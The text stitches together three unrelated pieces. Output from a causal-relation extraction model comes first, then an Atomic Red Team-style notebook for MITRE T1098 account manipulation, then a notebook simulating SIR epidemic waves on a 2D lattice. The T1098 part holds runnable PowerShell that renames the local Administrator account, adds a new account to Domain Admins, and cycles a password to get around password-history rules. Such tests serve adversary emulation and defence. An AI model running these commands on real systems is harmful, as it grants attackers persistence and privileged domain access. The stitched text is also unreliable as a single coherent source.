Sentence-132 The presentation uses animation to show how germs and microbes cause sickness , and outlines simple preventive measures
[(['germs'], ['sickness']), (['microbes'], ['sickness'])]
[(['germs'], ['sickness']), (['microbes'], ['sickness'])]
------------------
Sentence-133 The poet Essex Hemphill conquered sorrow after the loss of a friend by taking up the cause of that friend
[(['the', 'loss'], ['sorrow'])]
[(['the', 'loss'], ['sorrow'])]
------------------
Sentence-134 Pneumococcal meningitis is caused by pneumococcus bacteria , which also cause several diseases of the respiratory system , including pneumonia
[(['pneumococcus', 'bacteria'], ['Pneumococcal', 'meningitis']), (['pneumococcus', 'bacteria'], ['several', 'diseases'])]
[(['pneumococcus', 'bacteria'], ['Pneumococcal', 'meningitis']), (['pneumococcus', 'bacteria'], ['several', 'diseases'])]
------------------
Sentence-135 Traffic vibrations on the street outside had caused the movement of the light
[(['Traffic', 'vibrations'], ['the', 'movement'])]
[(['Traffic', 'vibrations'], ['the', 'movement'])]
------------------
Sentence-136 The cutaneous mycoses are caused by a homogeneous group of keratinophilic fungi termed the dermatophytes
[(['keratinophilic', 'fungi'], ['The', 'cutaneous', 'mycoses'])]
[(['a', 'homogeneous', 'group'], ['The', 'cutaneous', 'mycoses'])]
------------------
Sentence-137 Method according to claim 1 , characterized in that the time duration of the quality reduction is limited at least to the duration of the interference triggered by the switching process
[(['the', 'switching', 'process'], ['the', 'interference'])]
[(['the', 'switching', 'process'], ['the', 'interference'])]
------------------
Sentence-138 Smoke is one of the leading causes of kidney failures
[(['Smoke'], ['kidney', 'failures'])]
[(['Smoke'], ['kidney', 'failures'])]
------------------
Sentence-139 The disruption caused by the latest Christmas terrorist has added too much to the weary trip home
[(['the', 'latest', 'Christmas', 'terrorist'], ['The', 'disruption'])]
[(['the', 'latest', 'Christmas', 'terrorist'], ['The', 'disruption'])]
------------------
Sentence-140 Use outdoor where sunlight and glare cause eye strain and fatigue
[(['sunlight'], ['eye', 'strain', 'and', 'fatigue']), (['glare'], ['eye', 'strain', 'and', 'fatigue'])]
[(['sunlight'], ['eye', 'strain']), (['sunlight'], ['fatigue']), (['glare'], ['eye', 'strain']), (['glare'], ['fatigue'])]
------------------
Sentence-141 The announcement of the game caused a stir on the web yesterday , with the Weekly Standard launching a protest campaign encouraging readers to e-mail Microsoft and T-Enterprise , the out-of-its-depth company that had hired actual Gitmo detainee Moazzam Begg as a consultant on the game
[(['The', 'announcement'], ['a', 'stir'])]
[(['The', 'announcement'], ['a', 'stir'])]
------------------
Sentence-142 In these cases , the disappointment from the purchase is not forgotten over time , but rather accumulates
[(['the', 'purchase'], ['the', 'disappointment'])]
[(['the', 'purchase'], ['the', 'disappointment'])]
------------------
Sentence-143 Four of the entrapments resulted in suffocation : a 7-month-old in Gouverneur , N Y ; a 7-month-old in New Iberia , La ; a 6-month-old in Summersville , W Va ; and a 9-month-old in Bronx , N Y
[(['the', 'entrapments'], ['suffocation'])]
[(['the', 'entrapments'], ['suffocation'])]
------------------
Sentence-144 Muscle fatigue is the number one cause of arm muscle pain
[(['Muscle', 'fatigue'], ['arm', 'muscle', 'pain'])]
[(['Muscle', 'fatigue'], ['arm', 'muscle', 'pain'])]
------------------
Sentence-145 Thus previous scientific estimates had overstated the devastation caused by the asteroid , since topographic and ecologic factors contributing to the result had not been taken into account
[(['the', 'asteroid'], ['the', 'devastation']), (['topographic', 'and', 'ecologic', 'factors'], ['the', 'result'])]
[(['the', 'asteroid'], ['the', 'devastation'])]
------------------
Sentence-146 Lavender is excellent in the reatment of headaches from fatigue and exhaustion
[(['fatigue'], ['headaches']), (['exhaustion'], ['headaches'])]
[(['fatigue'], ['headaches']), (['exhaustion'], ['headaches'])]
------------------
Sentence-147 The vascular dilatation was caused by the sympathetic and the course of vaso-motor nerves
[(['the', 'sympathetic'], ['The', 'vascular', 'dilatation']), (['the', 'course'], ['The', 'vascular', 'dilatation'])]
[(['the', 'sympathetic'], ['The', 'vascular', 'dilatation'])]
------------------
Sentence-148 Increased reproductive toxicity of landfill leachate after degradation was caused by nitrite
[(['nitrite'], ['Increased', 'reproductive', 'toxicity'])]
[(['nitrite'], ['Increased', 'reproductive', 'toxicity']), (['nitrite'], ['degradation'])]
------------------
Sentence-149 Snails and slugs cause damage to seedlings , flowers , vegetables and shrubs
[(['Snails'], ['damage']), (['slugs'], ['damage'])]
[(['Snails'], ['damage']), (['slugs'], ['damage'])]
------------------
Sentence-150 Stimulation of the posterior horn of the medial meniscus produced a measurable amount of CMAP latency for the semimembranosus muscle
[(['Stimulation'], ['CMAP', 'latency'])]
[]
------------------
Sentence-151 The warmth was radiating from the fireplace to all corners of the room
[(['the', 'fireplace'], ['The', 'warmth'])]
[(['the', 'fireplace'], ['The', 'warmth'])]
------------------
Sentence-152 Cervical cancer is caused by infection with the human papillomavirus and is one of the most common cancers in women in developing countries
[(['infection'], ['Cervical', 'cancer'])]
[(['infection'], ['Cervical', 'cancer'])]
------------------
Sentence-153 A large tsunami triggered by the earthquake spread outward from off the Sumatran coast
[(['the', 'earthquake'], ['A', 'large', 'tsunami'])]
[(['the', 'earthquake'], ['A', 'large', 'tsunami'])]
------------------
Sentence-154 The transmitter generates the electromagnetic wave , some of which will be incident on the receiver
[(['The', 'transmitter'], ['the', 'electromagnetic', 'wave'])]
[(['The', 'transmitter'], ['the', 'electromagnetic', 'wave'])]
------------------
Sentence-155 Even nuclear energy is among the causes of water pollution
[(['Even', 'nuclear', 'energy'], ['water', 'pollution'])]
[(['nuclear', 'energy'], ['water', 'pollution'])]
------------------
Sentence-156 The drugs he sold had caused the overdose death of Matthew Lessard , 19 , of Lowell
[(['The', 'drugs'], ['the', 'overdose', 'death'])]
[(['The', 'drugs'], ['the', 'overdose', 'death'])]
------------------
Sentence-157 Chest pain from indigestion feels like an intense burning and is usually accompanied by regurgitation and gas
[(['indigestion'], ['Chest', 'pain'])]
[(['indigestion'], ['Chest', 'pain'])]
------------------
Sentence-158 The software caused a pretty good drain on the CPU for some reason
[(['The', 'software'], ['a', 'pretty', 'good', 'drain'])]
[(['The', 'software'], ['a', 'pretty', 'good', 'drain'])]
------------------
Sentence-159 The radiation from the atomic bomb explosion is a typical acute radiation
[(['the', 'atomic', 'bomb', 'explosion'], ['The', 'radiation'])]
[(['the', 'atomic', 'bomb', 'explosion'], ['The', 'radiation'])]
------------------
Sentence-160 Lymphedema is an abnormal build-up of fluid that causes swelling , most often in the arms or legs
[(['Lymphedema'], ['swelling'])]
[(['Lymphedema'], ['swelling'])]
------------------
Sentence-161 These chemical studies were directed toward proof of structure of the indole components of the seeds
[(['These', 'chemical', 'studies'], ['proof'])]
[]
------------------
###Markdown
2-002
###Code
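# NOTE (assumption): predict() is defined earlier in this notebook; it is expected to load the
# named checkpoint (FLAIR embeddings / character-CNN / multi-head self-attention / CRF variants)
# and, for each test sentence, print the gold cause-effect pairs followed by the predicted pairs,
# as in the output below. Replace the "your path to ..." placeholders with local checkpoint paths.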
predict('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/6_{96}.hdf5')
predict('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/6_{115}.hdf5')
predict('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/6_{198}.hdf5')
###Output
------------------
Sentence-001 Bounding pulses are caused by the relatively low systemic arterial blood pressure due to the continuous runoff of blood from the aorta into the pulmonary artery
[(['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'], ['Bounding', 'pulses']), (['the', 'continuous', 'runoff'], ['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'])]
[(['the', 'relatively', 'low', 'systemic', 'arterial', 'blood', 'pressure'], ['Bounding', 'pulses'])]
------------------
Sentence-002 This year's Nobel Laureates in Physiology or Medicine made the remarkable and unexpected discovery that inflammation in the stomach as well as ulceration of the stomach or duodenum is the result of an infection of the stomach caused by the bacterium Helicobacter pylori
[(['an', 'infection'], ['inflammation']), (['an', 'infection'], ['ulceration']), (['the', 'bacterium', 'Helicobacter', 'pylori'], ['an', 'infection'])]
[(['the', 'bacterium', 'Helicobacter', 'pylori'], ['the', 'remarkable', 'and', 'unexpected', 'discovery']), (['the', 'bacterium', 'Helicobacter', 'pylori'], ['an', 'infection'])]
------------------
Sentence-003 The drone strike that resulted in the death of Pakistan's most wanted terrorist is believed to be a result of deliberately planted false intelligence , sources in South Waziristan have confirmed
[(['The', 'drone', 'strike'], ['the', 'death']), (['deliberately', 'planted', 'false', 'intelligence'], ['The', 'drone', 'strike'])]
[(['The', 'drone', 'strike'], ['the', 'death'])]
------------------
Sentence-004 The violence resulted in the death of police " capo " Filippo Raciti , which caused widespread soul-searching and a week-long suspension of Italian football
[(['The', 'violence'], ['the', 'death']), (['the', 'death'], ['widespread', 'soul-searching']), (['the', 'death'], ['a', 'week-long', 'suspension'])]
[(['The', 'violence'], ['the', 'death']), (['The', 'violence'], ['widespread', 'soul-searching']), (['The', 'violence'], ['a', 'week-long', 'suspension'])]
------------------
Sentence-005 But the discomfort caused by the ointment and the duration of treatment often result in non-compliance
[(['the', 'discomfort'], ['non-compliance']), (['the', 'ointment'], ['the', 'discomfort']), (['the', 'duration'], ['non-compliance'])]
[(['the', 'discomfort'], ['non-compliance']), (['the', 'ointment'], ['the', 'discomfort']), (['treatment'], ['non-compliance'])]
------------------
Sentence-006 Each year , many infants and toddlers die due to suffocation from breathing small objects into their breathing passages and lungs
[(['suffocation'], ['die']), (['breathing', 'small', 'objects'], ['suffocation'])]
[(['breathing'], ['suffocation'])]
------------------
Sentence-007 I used to get terrible headaches from sinus infections that resulted in taking antibiotics a few times a year
[(['terrible', 'headaches'], ['taking', 'antibiotics']), (['sinus', 'infections'], ['terrible', 'headaches'])]
[(['sinus', 'infections'], ['headaches']), (['sinus', 'infections'], ['taking', 'antibiotics'])]
------------------
Sentence-008 The steam caused a backpressure on the VTD , resulting in the rupture disc opening
[(['The', 'steam'], ['a', 'backpressure']), (['a', 'backpressure'], ['the', 'rupture', 'disc', 'opening'])]
[(['The', 'steam'], ['a', 'backpressure']), (['a', 'backpressure'], ['the', 'rupture', 'disc'])]
------------------
Sentence-009 Swissair was a victim of the clandestine wealth-transfer plaguing the productive sector as a result of the falling interest-rate structure caused by bond speculation
[(['the', 'falling', 'interest-rate', 'structure'], ['a', 'victim']), (['bond', 'speculation'], ['the', 'falling', 'interest-rate', 'structure'])]
[(['bond', 'speculation'], ['the', 'falling', 'interest-rate', 'structure'])]
|
playbook/tactics/persistence/T1098.ipynb | ###Markdown
T1098 - Account ManipulationAdversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. Atomic Tests
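The two atomic tests below demonstrate renaming a local Administrator account and adding a new domain account to a privileged group. As a further illustration of the "iterative password updates" behaviour described above, here is a minimal PowerShell sketch: it is not one of the atomic tests, it assumes a disposable local account named `atomic_test_user`, and it should only be run in a lab environment.
```powershell
# Sketch only (assumed lab account "atomic_test_user"): cycle the password several times to push
# the original value out of the password-history window, then restore it.
$user = "atomic_test_user"
1..10 | ForEach-Object {
    $tmp = ConvertTo-SecureString ("Cycle!Pass{0:d4}" -f $_) -AsPlainText -Force
    Set-LocalUser -Name $user -Password $tmp
}
Set-LocalUser -Name $user -Password (ConvertTo-SecureString 'Original!Pass1' -AsPlainText -Force)
```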
###Code
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
###Output
_____no_output_____
###Markdown
Atomic Test 1 - Admin Account ManipulateManipulate Admin Account Name**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershell$x = Get-Random -Minimum 2 -Maximum 9999$y = Get-Random -Minimum 2 -Maximum 9999$z = Get-Random -Minimum 2 -Maximum 9999$w = Get-Random -Minimum 2 -Maximum 9999Write-Host HaHaHa_$x$y$z$w$hostname = (Get-CIMInstance CIM_ComputerSystem).Name$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Nameforeach($member in $fmm) { if($member -like "*Administrator*") { Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" Write-Host "Successfully Renamed Administrator Account on" $hostname } }```
###Code
Invoke-AtomicTest T1098 -TestNumbers 1
###Output
_____no_output_____
###Markdown
Atomic Test 2 - Domain Account and Group ManipulateCreate a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, you need to install the PS Module ActiveDirectory (in prereqs) and run the script with appropriate AD privileges to create the user and alter the group. Automatic installation of the dependency requires an elevated session, and is unlikely to work with Powershell Core (untested).If you consider running this test against a production Active Directory, the good practice is to create a dedicated service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated as group manager of the target group.Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`**Supported Platforms:** windows Dependencies: Run with `None`! Description: PS Module ActiveDirectory Check Prereq Commands:```NoneTry { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null exit 0} Catch { exit 1}``` Get Prereq Commands:```Noneif((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online} else { Install-WindowsFeature RSAT-AD-PowerShell}```
###Code
Invoke-AtomicTest T1098 -TestNumbers 2 -GetPreReqs
###Output
_____no_output_____
###Markdown
Attack Commands: Run with `powershell````powershell$x = Get-Random -Minimum 2 -Maximum 99$y = Get-Random -Minimum 2 -Maximum 99$z = Get-Random -Minimum 2 -Maximum 99$w = Get-Random -Minimum 2 -Maximum 99Import-Module ActiveDirectory$account = "atr--$x$y$z"New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False Add-ADGroupMember "Domain Admins" $account```
###Code
Invoke-AtomicTest T1098 -TestNumbers 2
###Output
_____no_output_____ |
notebooks/6-simulations/64-lattice_2d_nneighbors_loop_n2.ipynb | ###Markdown
Dynamics with nearest neighbors interactions[Index](../0-index.ipynb)
###Code
%load_ext autoreload
%autoreload 2
%matplotlib inline
from pathlib import Path
import sys
import numpy as np
import cupy as cp
import pandas as pd
import h5py
import datetime
import scipy
import imageio
from scipy.optimize import curve_fit
from scipy.integrate import solve_ivp
import warnings
warnings.filterwarnings('ignore')
import matplotlib.pyplot as plt
import matplotlib.colors as mco
import matplotlib.gridspec as mgs
import matplotlib.cm as cm
from matplotlib import animation
plt.rcParams['svg.fonttype'] = 'none'
from IPython.display import HTML
from IPython.display import Image
sys.path.append(str(Path('../..') / 'code'))
from functions import laplacian_discrete_conv, lattice_2d_integrate_sir
resdir = Path('../../results/')
if not resdir.is_dir():
raise ValueError('No results directory!')
resfile = resdir / 'lattice_2d_nneighbors.hdf5'
complevel=7
complib='zlib'
if resfile.is_file():
with h5py.File(resfile,'r') as f5py:
f5py.visit(print)
###Output
beta_1.0e-01
beta_1.0e-01/n1_10_n2_0
beta_1.0e-01/n1_10_n2_0/infected
beta_1.0e-01/n1_10_n2_0/susceptible
beta_1.0e-01/n1_10_n2_0/times
beta_1.0e-01/n1_10_n2_1
beta_1.0e-01/n1_10_n2_1/infected
beta_1.0e-01/n1_10_n2_1/susceptible
beta_1.0e-01/n1_10_n2_1/times
beta_1.0e-01/n1_10_n2_2
beta_1.0e-01/n1_10_n2_2/infected
beta_1.0e-01/n1_10_n2_2/susceptible
beta_1.0e-01/n1_10_n2_2/times
beta_1.0e-01/n1_10_n2_4
beta_1.0e-01/n1_10_n2_4/infected
beta_1.0e-01/n1_10_n2_4/susceptible
beta_1.0e-01/n1_10_n2_4/times
beta_1.0e-01/n1_10_n2_6
beta_1.0e-01/n1_10_n2_6/infected
beta_1.0e-01/n1_10_n2_6/susceptible
beta_1.0e-01/n1_10_n2_6/times
beta_1.0e-01/n1_10_n2_8
beta_1.0e-01/n1_10_n2_8/infected
beta_1.0e-01/n1_10_n2_8/susceptible
beta_1.0e-01/n1_10_n2_8/times
n1_10_n2_0
n1_10_n2_0/beta_1.0e-01
n1_10_n2_0/beta_1.0e-01/infected
n1_10_n2_0/beta_1.0e-01/susceptible
n1_10_n2_0/beta_1.0e-01/times
n1_10_n2_0/beta_2.0e-01
n1_10_n2_0/beta_2.0e-01/infected
n1_10_n2_0/beta_2.0e-01/susceptible
n1_10_n2_0/beta_2.0e-01/times
n1_10_n2_0/beta_4.0e-01
n1_10_n2_0/beta_4.0e-01/infected
n1_10_n2_0/beta_4.0e-01/susceptible
n1_10_n2_0/beta_4.0e-01/times
n1_10_n2_0/beta_5.0e-02
n1_10_n2_0/beta_5.0e-02/infected
n1_10_n2_0/beta_5.0e-02/susceptible
n1_10_n2_0/beta_5.0e-02/times
###Markdown
Parameters
###Code
n1 = 10 # 2^n1 is the length
n2 = 0 # 2^n2 is the height
Delta_x = 1
alpha = 1.0e-1 # intra-community infectivity coefficient
beta = alpha # extra-community infectivity coefficient
gamma = 0.1 # inverse recovery time
tmax = 3000. # maximum time
tdump = 1.0e0 # time interval between dumps
params = { \
'delta_x': Delta_x, \
'alpha': alpha, \
'beta': beta, \
'gamma': gamma, \
'n1': n1, \
'n2': n2, \
'tmax': tmax, \
'tdump': tdump
}
params_template = {key: params[key] for key in params.keys()}
pref = "beta_{:.1e}".format(beta)
cp.cuda.Device(0).use()
exts = ['.png', '.svg']
n2_list = [0, 1, 2, 4, 6, 8]
n_list = len(n2_list)
for n2 in n2_list:
print("".join(['-']*10))
print("n2 = {:.1e}".format(n2))
params = {key:params_template[key] for key in params_template.keys()}
params['n2'] = n2
# initial condition
eps = 1.0e-8 # total fraction of population
N = 2**(n1+n2) # total number of communities
S = cp.ones((2**n1, 2**n2), dtype=np.float_)
I = cp.zeros((2**n1, 2**n2), dtype=np.float_)
if n2 == 0:
V = cp.array([N*eps])
else:
V = cp.zeros(2**n2)
V[[2**(n2-1)-1,2**(n2-1)]] = 0.5*N*eps
S[0] -= V
I[0] += V
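    # Model assumed here (sketch, not verified against functions.py): lattice_2d_integrate_sir
    # is expected to integrate a lattice SIR system in which each community is infected at rate
    #   S * (alpha * I_local + beta * sum of I over the 4 nearest neighbours)
    # and recovers at rate gamma * I; this is consistent with the effective factor
    # a = alpha/beta + 4 used in the travelling-wave fit further below.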
times, Ss, Is = lattice_2d_integrate_sir(S, I, alpha=alpha, beta=beta, gamma=gamma, tmax=tmax, tdump=tdump, method='DOP853')
print("integration complete")
# save
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'a') as f5py:
if not (path in f5py.keys()):
grp = f5py.create_group(path)
grp = f5py[path]
for key in params.keys():
grp.attrs[key] = params[key]
# print(grp.keys())
name = "times"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=times.shape, dtype=times.dtype, data=times, \
compression="gzip", compression_opts=complevel)
name = "susceptible"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Ss.shape, dtype=Ss.dtype, data=Ss, \
compression="gzip", compression_opts=complevel)
name = "infected"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Is.shape, dtype=Is.dtype, data=Is, \
compression="gzip", compression_opts=complevel)
print("data written to {:s}>{:s}".format(str(resfile), path))
times_list = []
I_tot_list = []
T_tot_list = []
dT_tot_list = []
Sm_list = []
Im_list = []
Tm_list = []
dTm_list = []
for n2 in n2_list:
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][:]
name = "susceptible"
Ss = grp[name][:]
name = "infected"
Is = grp[name][:]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
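    # Ts is the cumulative fraction ever infected (1 - S); dTs is its discrete time derivative,
    # i.e. the rate of new cases per community, with the first frame taken from I[0] so the
    # array keeps the same length as `times`.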
dT_tot = np.mean(dTs, axis=(1,2))
T_tot = np.mean(Ts, axis=(1,2))
I_tot = np.mean(Is, axis=(1,2))
if n2 == 0:
midline = [0]
else:
midline = [2**(n2-1)-1,2**(n2-1)]
Sm = np.mean(Ss[:,:,midline], axis=2)
Im = np.mean(Is[:,:,midline], axis=2)
Tm = np.mean(Ts[:,:,midline], axis=2)
dTm = np.mean(dTs[:,:,midline], axis=2)
times_list.append(times)
I_tot_list.append(I_tot)
T_tot_list.append(T_tot)
dT_tot_list.append(dT_tot)
Sm_list.append(Sm)
Im_list.append(Im)
dTm_list.append(dTm)
Tm_list.append(Tm)
###Output
_____no_output_____
###Markdown
Figures
###Code
figdir = Path('..') / '..' / 'figures' / '6-simulations' / '64-lattice_2d_nneighbors_loop_n2'
if not figdir.is_dir():
figdir.mkdir(parents=True, exist_ok=True)
print(figdir)
###Output
../../figures/6-simulations/64-lattice_2d_nneighbors_loop_n2
###Markdown
Total number of new cases
###Code
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
show_dT=False
norm = mco.Normalize(vmin=0, vmax=n_list-1)
cmap = cm.rainbow
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
if show_dT:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dT_tot = dT_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,dT_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$d T$", fontsize="medium")
fname = 'domega_tot'
else:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
T_tot = T_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,T_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$T$", fontsize="medium")
fname = 'omega_tot'
ax.legend(loc='best', fontsize='medium')
ax.set_xlim(times[0],None)
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Wave position
###Code
from functions import lattice_2d_ramp_fit as ramp_fit
from functions import lattice_2d_get_velocity_theoretical as get_velocity_theoretical
from functions import framp
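# Assumption about the helpers imported above: ramp_fit is expected to fit a (piecewise-)linear
# ramp framp(t) ~ v*(t - t0) to the position of the front maximum, so the fitted parameters give
# the measured front speed and onset time, while get_velocity_theoretical is assumed to return
# the theoretical front speed drawn as the dash-dotted reference line below.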
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
pfit_list = []
# make figure
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
ax.plot(times, W, '-', color=color, lw=lw, ms=ms, label=label)
pfit = ramp_fit(W, times, wmax=0.2*np.max(W), maxfev=1000)
pfit_list.append(pfit)
plt.plot(times, framp(times, *pfit), 'k--', lw=lw)
    v = get_velocity_theoretical(beta, gamma, alpha, S_ss=1.)
    plt.plot(times, v*(times-pfit[1]), 'k-.', lw=lw)
ax.set_xlim(times[0],None)
ax.set_ylim(0., None)
ax.set_xlabel("time", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'wave_position'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
fname = 'wave_position'
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Fit to analytical prediction
###Code
from functions import wave_front_get_ode_sol, get_binned
from scipy.optimize import minimize_scalar, bracket
from functions import lattice_2d_get_velocity as get_velocity
from functions import lattice_2d_rescale_wave_profile as rescale_wave_profile
figsize=(8,4.5)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
kfit_list = []
dx = params['delta_x']
X = np.arange(2**n1, dtype=np.float_)
for n in range(n_list):
# for n in range(2):
n2 = n2_list[n]
alpha = beta
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
v = get_velocity(W, times, wmax=0.2*np.max(W), maxfev=1000)
a = alpha/beta + 4.
C = a*beta**2/(4*v**2)
D = 2*gamma/(beta*a)
CMAX = 1./(16*(1-0.5*D))
print("v = {:.4f} C = {:.4f} D = {:.4f} CMAX = {:.4f}".format(v,C,D,CMAX))
# theoretical value for scale k
kfit = 2*v/beta
# compute profile (centered around its maximum)
Z_C, Y_C, S_C, R_C = wave_front_get_ode_sol(C, D, tmax=10000, npts=100000, eps=1.0e-3)
k0 = np.argmax(Y_C)
Z_C -= Z_C[k0]
# fit the wave profile at a given time
kt = int(0.9*len(times))
Z, Y = rescale_wave_profile(kfit, X, dTm[kt], Z_C, Y_C, v, dx)
# plots
ax.plot(Z_C, Y_C, '-', color=color, lw=lw)
ax.plot(Z, Y, 's', color=color, ms=2*ms, label="n2 = {:d}, C = {:.4f}".format(n2, C))
# ax.plot(Z, G/(v*kfit/2.), 's', color=color, ms=2*ms, label="beta = {:.1e}, C = {:.4f}".format(beta, C))
ax.set_xlim(-100,100)
# ax.set_ylim(0., 1)
ax.legend(loc='upper left', fontsize='medium', bbox_to_anchor=(1., 0.98), frameon=False)
ax.set_xlabel("date", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'profile_collapse_fit'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Show wave profiles
###Code
time_sel = np.linspace(0., 200, 21).astype('int64')
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
times = times_list[n]
dTm = dTm_list[n]
norm = mco.Normalize(0, len(time_sel)-1)
cmap = cm.viridis
figsize=(12,3)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
X = np.arange(2**n1, dtype=np.float_)
for k in range(len(time_sel)):
t = time_sel[k]
color = cmap(norm(k))
Y = dTm[t]
idx = Y > 0.
ax.plot(X[idx], Y[idx], '-', color=color, lw=lw)
# ax.legend(loc='best')
ax.set_xlim(0,None)
ax.set_ylim(0., None)
ax.set_xlabel("x", fontsize="medium")
ax.set_ylabel("dT", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout(rect=[0., 0., 0.98, 1.])
cax = fig.add_axes(rect=[0.98,0.2,0.01,0.7])
cbar = plt.colorbar(cm.ScalarMappable(norm=norm, cmap=cmap),
cax=cax, extendfrac='auto')
cbar.set_label("time")
fname = 'wave_profiles_n2_{:d}'.format(n2)
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
n2 = 0
fname = 'wave_profiles_n2_{:d}'.format(n2)
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*480)
###Output
_____no_output_____
###Markdown
Wave animation
###Code
fps = 30
dpi=300
outputdir = figdir / '2d_plots'
idump = max(int(tmax/tdump/1000),1)
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][::idump]
name = "susceptible"
Ss = grp[name][::idump]
name = "infected"
Is = grp[name][::idump]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
tpdir = outputdir / 'n2_{:d}'.format(n2)
if not tpdir.is_dir():
tpdir.mkdir(parents=True, exist_ok=True)
for ext in exts:
for f in tpdir.glob('*' + ext): f.unlink()
